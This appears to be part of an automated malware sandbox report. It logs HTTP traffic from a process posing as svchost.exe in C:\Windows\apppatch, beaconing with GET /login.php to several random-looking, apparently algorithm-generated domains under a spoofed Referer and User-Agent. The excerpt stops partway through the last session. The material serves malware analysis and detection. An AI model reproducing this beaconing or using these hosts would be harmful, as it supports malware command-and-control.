                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            39192.168.2.45404269.162.80.62807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.127598047 CEST293OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyfyj.com
                                                                                                                                                                                                            Cookie: sid=cabcb30f-6daf-11ef-bf0d-9c5eae0a9761
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.599963903 CEST772INHTTP/1.1 200 OK
                                                                                                                                                                                                            accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            cache-control: max-age=0, private, must-revalidate
                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                            content-length: 481
                                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                                            date: Sun, 08 Sep 2024 07:00:11 GMT
                                                                                                                                                                                                            server: nginx
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 6c 79 73 79 66 79 6a 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 63 68 3d 31 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 63 79 4e 54 63 34 4e 6a 41 78 4d 53 77 69 61 57 46 30 49 6a 6f 78 4e 7a 49 31 4e 7a 63 34 4f 44 45 78 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 64 6e 42 71 4e 57 4a 7a 4d 58 49 32 4d 54 64 68 4d 6e 45 33 61 47 73 78 4f 54 64 6f 63 7a 4d 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 33 4d 6a 55 33 4e 7a 67 34 4d 54 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNTc4NjAxMSwiaWF0IjoxNzI1Nzc4ODExLCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydnBqNWJzMXI2MTdhMnE3aGsxOTdoczMiLCJuYmYiOjE3MjU3Nzg4MTEsInRzIjoxNzI1Nzc4ODExNTkyMDcyfQ.E82c0P2hrG2LmDTMCBwILDVtlaljPVneA8HN5jqC4YQ&sid=cabcb30f-6daf-11ef-bf0d-9c5eae0a9761');</script></body></html>
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.600675106 CEST772INHTTP/1.1 200 OK
                                                                                                                                                                                                            accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            cache-control: max-age=0, private, must-revalidate
                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                            content-length: 481
                                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                                            date: Sun, 08 Sep 2024 07:00:11 GMT
                                                                                                                                                                                                            server: nginx
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 6c 79 73 79 66 79 6a 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 63 68 3d 31 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 63 79 4e 54 63 34 4e 6a 41 78 4d 53 77 69 61 57 46 30 49 6a 6f 78 4e 7a 49 31 4e 7a 63 34 4f 44 45 78 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 64 6e 42 71 4e 57 4a 7a 4d 58 49 32 4d 54 64 68 4d 6e 45 33 61 47 73 78 4f 54 64 6f 63 7a 4d 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 33 4d 6a 55 33 4e 7a 67 34 4d 54 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNTc4NjAxMSwiaWF0IjoxNzI1Nzc4ODExLCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydnBqNWJzMXI2MTdhMnE3aGsxOTdoczMiLCJuYmYiOjE3MjU3Nzg4MTEsInRzIjoxNzI1Nzc4ODExNTkyMDcyfQ.E82c0P2hrG2LmDTMCBwILDVtlaljPVneA8HN5jqC4YQ&sid=cabcb30f-6daf-11ef-bf0d-9c5eae0a9761');</script></body></html>
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.601283073 CEST772INHTTP/1.1 200 OK
                                                                                                                                                                                                            accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            cache-control: max-age=0, private, must-revalidate
                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                            content-length: 481
                                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                                            date: Sun, 08 Sep 2024 07:00:11 GMT
                                                                                                                                                                                                            server: nginx
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 6c 79 73 79 66 79 6a 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 63 68 3d 31 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 63 79 4e 54 63 34 4e 6a 41 78 4d 53 77 69 61 57 46 30 49 6a 6f 78 4e 7a 49 31 4e 7a 63 34 4f 44 45 78 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 64 6e 42 71 4e 57 4a 7a 4d 58 49 32 4d 54 64 68 4d 6e 45 33 61 47 73 78 4f 54 64 6f 63 7a 4d 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 33 4d 6a 55 33 4e 7a 67 34 4d 54 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNTc4NjAxMSwiaWF0IjoxNzI1Nzc4ODExLCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydnBqNWJzMXI2MTdhMnE3aGsxOTdoczMiLCJuYmYiOjE3MjU3Nzg4MTEsInRzIjoxNzI1Nzc4ODExNTkyMDcyfQ.E82c0P2hrG2LmDTMCBwILDVtlaljPVneA8HN5jqC4YQ&sid=cabcb30f-6daf-11ef-bf0d-9c5eae0a9761');</script></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            40192.168.2.45404623.253.46.64807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.142412901 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyqah.com
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.599864006 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:10 GMT
                                                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.599890947 CEST169INData Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.600050926 CEST169INData Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.600615025 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:10 GMT
                                                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.601227045 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:10 GMT
                                                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.607739925 CEST169INData Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            41192.168.2.454043188.114.96.3807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.205440998 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.600665092 CEST618INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:11 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://qegyhig.com/login.php
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q6nV9uIbceKAcT5oscYip5TyuTCvXfX7Kx1RgXCAY5z3eeiNuiNf%2BB4Xn6mw%2BaGN4TmqjD3aj%2F5sbzRPKwY1wz0rNuhNYWrHrh6xjvAYamxFrmT37pZu7mppdHUK5w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8bfd0f6439ef4295-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.600950956 CEST173INData Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.600960970 CEST173INData Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.601183891 CEST791INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:11 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://qegyhig.com/login.php
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q6nV9uIbceKAcT5oscYip5TyuTCvXfX7Kx1RgXCAY5z3eeiNuiNf%2BB4Xn6mw%2BaGN4TmqjD3aj%2F5sbzRPKwY1wz0rNuhNYWrHrh6xjvAYamxFrmT37pZu7mppdHUK5w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8bfd0f6439ef4295-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            42192.168.2.454044208.100.26.245807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.205537081 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyvyxor.com
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.599904060 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:11 GMT
                                                                                                                                                                                                            Content-Type: text/html
